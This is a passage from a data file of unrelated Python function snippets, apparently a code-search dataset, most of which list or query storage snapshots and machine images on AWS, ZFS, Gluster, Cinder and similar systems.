dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def get(isamAppliance, check_mode=False, force=False):\n return isamAppliance.invoke_get(\"Retrieving snapshots\", \"/snapshots\")", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def get_snap_list(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot list --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot list' on node %s. 
\"\n \"Hence failed to get the snapshot list.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"list xml output.\")\n return None\n\n snap_list = []\n for snap in root.findall(\"snapList/snapshot\"):\n snap_list.append(snap.text)\n\n return snap_list", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def get_snapshot_list(self, base, snappref=\"SPECTRA_\"):\n #print('Looking for spectra in', base)\n powerspectra = FluxPower(maxk=self.max_k)\n for snap in range(30):\n snapdir = os.path.join(base,snappref+str(snap).rjust(3,'0'))\n #We ran out of snapshots\n if not os.path.exists(snapdir):\n snapdir = os.path.join(base,\"PART_\"+str(snap).rjust(3,'0'))\n if not os.path.exists(snapdir):\n snapdir = os.path.join(base, \"snap_\"+str(snap).rjust(3,'0'))\n if not os.path.exists(snapdir):\n continue\n #We have all we need\n if powerspectra.len() == np.size(self.zout):\n break\n try:\n ss = self._get_spectra_snap(snap, base)\n# print('Found spectra in', ss)\n if ss is not None:\n powerspectra.add_snapshot(snap,ss)\n except IOError:\n print(\"Didn't find any spectra because of IOError\")\n continue\n #Make sure we have enough outputs\n if powerspectra.len() != np.size(self.zout):\n raise ValueError(\"Found only\",powerspectra.len(),\"of\",np.size(self.zout),\"from snaps:\",powerspectra.snaps)\n return powerspectra", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def getami(ec2, glob):\n\treturn [\n\t\ti for i in ec2.images.filter(\n\t\t\tFilters=[{'Name': 'name', 'Values': [glob]}]\n\t\t)\n\t]", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n 
for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def RetrieveACISA():\n\tdb = DBConnector()\n\tcur = db.cursor()\n\n\tSQLcmd = \"SELECT * FROM snaps.SNAPsLocation\"\n\tcur.execute(SQLcmd)\n\treturnList = []\n\tcount = 0\n\tfor item in cur.fetchall():\n\t\tcount += 1\n\t\ttmplist = [item[1], item[2], count, str(item[0])]\n\t\treturnList.append(tmplist)\n\treturn returnList", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def get_ami_by_id ( ec2_conn, ami_id ) :\n amis = ec2_conn.get_all_images( image_ids = [ ami_id ] )\n for ami in amis :\n return ami", "def snapshot_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def share_snapshot_access_get_all_for_snapshot_instance(\n context, snapshot_instance_id, filters=None,\n with_snapshot_access_data=True, 
session=None):\n session = session or get_session()\n filters = copy.deepcopy(filters) if filters else {}\n filters.update({'share_snapshot_instance_id': snapshot_instance_id})\n\n query = _share_snapshot_instance_access_get_query(context, session)\n\n legal_filter_keys = (\n 'id', 'share_snapshot_instance_id', 'access_id', 'state')\n\n query = exact_filter(\n query, models.ShareSnapshotInstanceAccessMapping, filters,\n legal_filter_keys)\n\n instance_accesses = query.all()\n\n if with_snapshot_access_data:\n instance_accesses = _set_instances_snapshot_access_data(\n context, instance_accesses, session)\n\n return instance_accesses", "def snapshot_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def snapshot_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def list_amis(self):\n images = self._driver.list_images(ex_owner=self.account_id)\n return images", "def get_snapshot_children(self, snapshot):\n LOG.debug('get_snapshot_children starts.')\n pool_name = self.configuration.rbd_pool\n volume_name = \\\n 'volume-%s' % encodeutils.safe_encode(snapshot[\"volume_id\"])\n snap_name = 'snapshot-%s' % encodeutils.safe_encode(snapshot['id'])\n children = list()\n children_on_snap = \\\n self._get_snapshot_children(pool_name, volume_name, snap_name)\n if children_on_snap is not None:\n for child in children_on_snap:\n item = dict()\n if len(child) == 2:\n item[\"pool_name\"] = child[0]\n item[\"volume_name\"] = child[1]\n if child[1].startswith(\"volume-\"):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1][len(\"volume-\"):]\n elif uuidutils.is_uuid_like(child[1]):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n children.append(item)\n\n LOG.debug('snapshot children: %s', children)\n LOG.debug('get_snapshot_children finished.')\n return children", "def get_ami_by_name ( ec2_conn, ami_name ) :\n amis = ec2_conn.get_all_images( filters = { \"name\": [ ami_name ] } )\n for ami in amis :\n return ami", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n 
click.echo(table.get_string())\n else:\n click.echo(res.content)", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def list(self, arguments):\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n print(vmrun.listSnapshots())", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def snapshoted_instances_query(self):\n if self.row_converter.obj.id is None:\n # For new object query should be empty\n return self.mapping_object.query.filter(\n self.mapping_object.id.is_(None))\n rel_snapshots = models.Relationship.get_related_query(\n self.row_converter.obj, models.Snapshot(),\n ).subquery(\"snapshot_rel\")\n case_statement = sqlalchemy.case(\n [\n (\n rel_snapshots.c.destination_type == models.Snapshot.__name__,\n rel_snapshots.c.destination_id,\n ),\n ],\n else_=rel_snapshots.c.source_id,\n )\n snapshot = models.Snapshot.query.filter(\n models.Snapshot.id == case_statement,\n models.Snapshot.child_type == self.mapping_object.__name__,\n ).options(\n load_only(models.Snapshot.child_id)\n ).subquery('snapshots')\n return self.mapping_object.query.filter(\n self.mapping_object.id == snapshot.c.child_id\n )", "def get_snap_info(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot info --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot info' on node %s. 
\"\n \"Hence failed to get the snapshot info.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"info xml output.\")\n return None\n\n snap_info_list = []\n for snap in root.findall(\"snapInfo/snapshots/snapshot\"):\n snap_info = {}\n for element in snap.getchildren():\n if element.tag == \"snapVolume\":\n info = {}\n for elmt in element.getchildren():\n if elmt.tag == \"originVolume\":\n info[\"originVolume\"] = {}\n for el in elmt.getchildren():\n info[elmt.tag][el.tag] = el.text\n else:\n info[elmt.tag] = elmt.text\n snap_info[element.tag] = info\n else:\n snap_info[element.tag] = element.text\n snap_info_list.append(snap_info)\n return snap_info_list", "def ami_lookup(session, ami_name, version = None):\n if session is None:\n return None\n\n specific = False\n if ami_name.endswith(\".boss\"):\n ami_version = os.environ[\"AMI_VERSION\"] if version is None else version\n if ami_version == \"latest\":\n # limit latest searching to only versions tagged with hash information\n ami_search = ami_name + \"-h*\"\n else:\n ami_search = ami_name + \"-\" + ami_version\n specific = True\n else:\n ami_search = ami_name\n\n client = session.client('ec2')\n response = client.describe_images(Filters=[{\"Name\": \"name\", \"Values\": [ami_search]}])\n if len(response['Images']) == 0:\n if specific:\n print(\"Could not locate AMI '{}', trying to find the latest '{}' AMI\".format(ami_search, ami_name))\n return ami_lookup(session, ami_name, version = \"latest\")\n else:\n return None\n else:\n response['Images'].sort(key=lambda x: x[\"CreationDate\"], reverse=True)\n image = response['Images'][0]\n ami = image['ImageId']\n tag = _find(image.get('Tags', []), lambda x: x[\"Key\"] == \"Commit\")\n commit = None if tag is None else tag[\"Value\"]\n\n return (ami, commit)", "def show_volume_snapshot(self, snapshot, check=True):\n cmd = 'cinder snapshot-show ' + snapshot.id\n\n exit_code, stdout, stderr = self.execute_command(\n cmd, timeout=config.SNAPSHOT_SHOW_TIMEOUT, check=check)\n\n snapshot_table = output_parser.table(stdout)\n show_result = {key: value for key, value in snapshot_table['values']}\n\n if check:\n assert_that(show_result['id'], is_(snapshot.id))\n if snapshot.name:\n assert_that(show_result['name'], is_(snapshot.name))\n if snapshot.description:\n assert_that(show_result['description'],\n is_(snapshot.description))", "def _get_matching_records(self, args, manifest) -> ty.List[dict]:\n if args.all:\n records = manifest._items # type: ty.List[dict]\n else:\n tags = dict(args.tag or [])\n try:\n records = [manifest.locate(args.type[0], **tags)]\n except exceptions.NoMatchingAsset:\n records = []\n return records", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def find_all(v):\n screen = 
G.DEVICE.snapshot(quality=ST.SNAPSHOT_QUALITY)\n return v.match_all_in(screen)", "def list(self, detailed=True, search_opts=None, marker=None, limit=None,\n sort=None):\n resource_type = \"snapshots\"\n url = self._build_list_url(resource_type, detailed=detailed,\n search_opts=search_opts, marker=marker,\n limit=limit, sort=sort)\n return self._list(url, resource_type, limit=limit)", "def af_list(self) -> list[PinAF]:", "def ls():\n # TODO: listing all availabe containers form sequence\n return", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. \"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def ListSnapshots(self):\n file_names = sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def list_artifacts(arn=None, type=None, nextToken=None):\n pass", "def list_reference_images_in_filter(conn,primary_ref,f,log):\n\n log.info('Identifying all current reference image in filter '+str(f))\n\n query = 'SELECT * FROM reference_images WHERE filter=\"'+str(primary_ref[f])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND facility!=\"'+str(primary_ref['facility_id'])+'\"'\n\n ref_image_list = phot_db.query_to_astropy_table(conn, query, args=())\n\n log.info(repr(ref_image_list))\n\n return ref_image_list", "def get_snapshots(vol_name):\n\n l = None\n try:\n cmd = 'gluster snapshot info volume %s --xml' % vol_name\n d, err = xml_parse.run_gluster_command(cmd)\n if err:\n raise Exception(err)\n if d:\n if d[\"op_status\"][\"op_ret\"] == 0:\n l, err = xml_parse.get_snapshots(d[\"root\"])\n if err:\n raise Exception(err)\n except Exception, e:\n return None, 'Error getting volume snapshots: %s' % str(e)\n else:\n return l, None", "def get_snapshot_disks_by_snapshot_obj(snapshot):\n return DISKS_API.getElemFromLink(snapshot)", "def servicemanage_snapshot_glance_metadata_get(context, snapshot_id, session=None):\n if not session:\n session = get_session()\n\n return session.query(models.ServiceManageGlanceMetadata).\\\n filter_by(snapshot_id=snapshot_id).\\\n filter_by(deleted=False).all()", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def listObjects(instance):\n # Get a cursor from the DB connection.\n cursor = Conection.connect(DB_USER, DB_PASSWD, instance, DB_HOST)\n \n # Compose the SQL query to find all the orbits/SSM objects. 
We do this with \n # a simle query to the derivedobjects table since we realy only need the\n # ssm_id values.\n maxMJD = completedPrecoveryMaxDate(instance)\n if(maxMJD == None):\n return([], None)\n \n sql = 'select distinct(ssm_id) from derivedobjects where ssm_id is not null'\n sql += ' and status = \"I\"'\n # sql += ' and updated >= \"%s\"' %(minModifiedDate)\n # <-- end if\n \n nRes = cursor.execute(sql)\n return([x[0] for x in cursor.fetchall()], float(maxMJD))", "def get_snap_status(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot status --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot status' on node %s. \"\n \"Hence failed to get the snapshot status.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"status xml output.\")\n return None\n\n snap_status_list = []\n for snap in root.findall(\"snapStatus/snapshots/snapshot\"):\n snap_status = {}\n for element in snap.getchildren():\n if element.tag == \"volume\":\n status = {}\n status[\"brick\"] = []\n for elmt in element.getchildren():\n if elmt.tag == \"brick\":\n brick_info = {}\n for el in elmt.getchildren():\n brick_info[el.tag] = el.text\n status[\"brick\"].append(brick_info)\n else:\n status[elmt.tag] = elmt.text\n\n snap_status[element.tag] = status\n else:\n snap_status[element.tag] = element.text\n snap_status_list.append(snap_status)\n return snap_status_list", "def list_distributed_cameras(ns_host=None, metadata=None):\n with get_running_nameserver() as name_server:\n camera_uris = name_server.yplookup(meta_all=metadata)\n camera_uris = {k: v[0] for k, v in camera_uris.items()}\n logger.debug(f\"Found {len(camera_uris)} cameras on name server.\")\n return camera_uris", "def list_distributed_cameras(ns_host=None, metadata=None):\n with get_running_nameserver() as name_server:\n camera_uris = name_server.yplookup(meta_all=metadata)\n camera_uris = {k: v[0] for k, v in camera_uris.items()}\n logger.debug(f\"Found {len(camera_uris)} cameras on name server.\")\n return camera_uris", "def getVCDRPGSnaps(**kwargs):\n strVCDRProdURL = kwargs['strVCDRProdURL']\n sessiontoken = kwargs['sessiontoken']\n if kwargs['cloud_fs_id'] is None:\n print(\"Please specify the ID of the cloud file system using '-cloud-fs-id'\")\n sys.exit(1)\n if kwargs['protection_group_id'] is None:\n print(\"Please specify the ID of the protection group using '-protection-group-id'\")\n sys.exit(1)\n cloud_fs_id = kwargs['cloud_fs_id']\n pg_id = kwargs['protection_group_id']\n if kwargs['protection_group_snap_id'] is None:\n json_response = get_vcdr_pg_snaps_json(strVCDRProdURL, cloud_fs_id, pg_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n snaps = json_response[\"snapshots\"]\n table = PrettyTable(['Snapshot Name', 'Snaphot ID'])\n for i in snaps:\n table.add_row([i['name'], i['id']])\n print(table)\n else:\n snap_id = kwargs['protection_group_snap_id']\n json_response = get_vcdr_pg_snap_details_json(strVCDRProdURL, cloud_fs_id, pg_id, snap_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n create_stamp_int = int(json_response['creation_timestamp'])\n create_stamp = datetime.utcfromtimestamp(create_stamp_int/1e9)\n expire_stamp_int = int(json_response['expiration_timestamp'])\n expire_stamp = datetime.utcfromtimestamp(expire_stamp_int/1e9)\n print(\" \")\n print(f\"Snapshot Name: {json_response['name']}\")\n # print(f\"Snapshot Creation: 
{json_response['creation_timestamp']}\")\n print(f\"Snapshot Creation: {create_stamp}\")\n print(f\"Snapshot Expiration: {expire_stamp}\")\n print(f\"Snapshot Trigger: {json_response['trigger_type']}\")\n print(f\"Number of VM: {json_response['vm_count']}\")\n print(\" \")", "def get_snapshots(FIELDS='all'):\n snapinfostr = fork_and_get_output(\"zfs list -t snapshot -H -o {0}\".format(FIELDS).split())\n header = get_zfs_snap_header()\n snapinfo = snapinfostr.splitlines()\n snapobjs = []\n for snapstr in snapinfo:\n snapobjs.append(DataZFS(snapstr, header, 'snapshot'))\n return snapobjs", "def get_snapshots(self):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/snapshots\"\n\n response = self.connector.http_call(\"get\", _url)\n self.snapshots = response.json()", "def _from_snapshot_request(pre_image, image):\n if pre_image.status == 'queued' and len(image.locations) == 1:\n loc_meta = image.locations[0]['metadata']\n return loc_meta and loc_meta.get('image_from', None) in ['snapshot',\n 'volume']", "def history(self) -> List[SnapshotLogEntry]:\n return self.metadata.snapshot_log", "def showSnapshots(self):\n from .utils import sp\n s = self.getSnapshots()\n ax = sp(len(s))\n for i, S in enumerate(s):\n ax[i].imshow(S)", "def detect_objects(snap):\n client = vision.ImageAnnotatorClient()\n print(snap)\n\n with open(snap, 'rb') as im_file:\n content = im_file.read()\n image = vision.Image(content=content)\n\n objects = client.object_localization(image=image).localized_object_annotations\n\n print(f\"Found {len(objects)} objects\")\n [print(f\"{objet.name} : {round(objet.score*100,2)}\") for objet in objects]\n \n return objects", "def get_apid_objects(queue, media_base, args, absolute=False):\n work_lock = Lock()\n work_queue = Queue()\n\n readers = os.cpu_count()\n read_lock = Lock()\n read_queue = Queue()\n read_processes = []\n for number in range(readers):\n read_process = Process(\n target=read_apids, args=(read_queue, read_lock, work_queue, work_lock)\n )\n read_process.start()\n read_processes.append(read_process)\n\n logging.info(\"Collecting APID object information\")\n file_list = []\n file_total = 0\n for file_object in os.scandir(media_base + \"/metadata/apid\"):\n if not file_object.is_file():\n continue\n file_list.append({\"fileName\": file_object.path})\n file_total = file_total + 1\n\n read_lock.acquire()\n for item in file_list:\n read_queue.put(item)\n for item in read_processes:\n read_queue.put({\"exit\": True})\n read_lock.release()\n\n index = 100000\n apid_image_map = {}\n apid_screenshot_map = {}\n apid_full_map = {}\n object_map = {}\n image_cache = {}\n item_count = 0\n if absolute:\n image_base = \"{0}\".format(media_base) + \"/media/{0}\"\n else:\n image_base = \"./media/{0}\"\n while True:\n work_lock.acquire()\n if not work_queue.empty():\n metadata = work_queue.get()\n work_lock.release()\n else:\n work_lock.release()\n time.sleep(0.01)\n continue\n\n item_count = item_count + 1\n apid_full_map.update({metadata[\"apid\"]: metadata})\n if \"image\" in metadata:\n if metadata[\"image\"] not in image_cache:\n base_name = metadata[\"image\"].split(\"/media/\").pop(1)\n image_name = image_base.format(base_name)\n image_extension = image_name.split(\".\").pop(-1)\n\n object_id = \"@M{0}@\".format(index)\n object_entry = [\n \"0 {0} OBJE\".format(object_id),\n \"1 FILE {0}\".format(image_name),\n \"1 FORM {0}\".format(image_extension),\n \"1 TYPE document\",\n ]\n\n object_map.update({object_id: object_entry})\n 
image_cache.update({metadata[\"image\"]: object_id})\n index = index + 1\n else:\n object_id = image_cache[metadata[\"image\"]]\n apid_image_map.update({metadata[\"apid\"]: object_id})\n if \"screenshot\" in metadata:\n base_name = os.path.basename(metadata[\"screenshot\"])\n image_name = image_base.format(\"apid\") + \"/\" + base_name\n image_extension = image_name.split(\".\").pop(-1)\n\n if \"title\" in metadata and metadata[\"title\"] != \"\":\n title = metadata[\"title\"]\n else:\n title = \"Ancestry.com Source Record, {0}\".format(metadata[\"apid\"])\n\n object_id = \"@M{0}@\".format(index)\n object_entry = [\n \"0 {0} OBJE\".format(object_id),\n \"1 FILE {0}\".format(image_name),\n \"1 FORM {0}\".format(image_extension),\n \"1 TITL {0}\".format(title),\n \"1 REFN {0}\".format(metadata[\"apid\"]),\n ]\n\n if \"url\" in metadata and metadata[\"url\"] != \"\":\n object_entry.append(\"1 NOTE {0}\".format(metadata[\"url\"]))\n\n object_map.update({object_id: object_entry})\n index = index + 1\n apid_screenshot_map.update({metadata[\"apid\"]: object_id})\n\n if item_count == file_total:\n break\n\n for read_process in read_processes:\n read_process.join()\n queue.put((apid_image_map, apid_screenshot_map, apid_full_map, object_map))\n logging.info(\"APID object collection completed\")", "def show_snapshot_metadata_item(self, snapshot_id, id):\n url = \"snapshots/%s/metadata/%s\" % (snapshot_id, id)\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot_metadata_item, resp, body)\n return rest_client.ResponseBody(resp, body)", "def _scanRpms(self, snapshot):\n\t\tdistribution = snapshot.distribution()\n\t\tkey = \"%s:%s\" % (distribution[\"product\"], distribution[\"version\"])\n\t\tself._failed[key] = []\n\t\tself._scanned[key] = 0\n\n\t\tprint \"%sScanning %s %s ...%s\" % (BLUE, distribution[\"product\"], distribution[\"version\"], ENDC)\n\t\ttotal = len(snapshot.json()[\"builds\"])\n\t\tindex = 1\n\t\tfor package in snapshot.json()[\"builds\"]:\n\t\t\t# scan devel and unit-tests only\n\t\t\trpms = filter(lambda l: GolangRpm(package[\"build\"], l).provideSourceCode(), package[\"rpms\"])\n\n\t\t\tif rpms == []:\n\t\t\t\tcontinue\n\n\t\t\tdata = {\n\t\t\t\t\"product\": 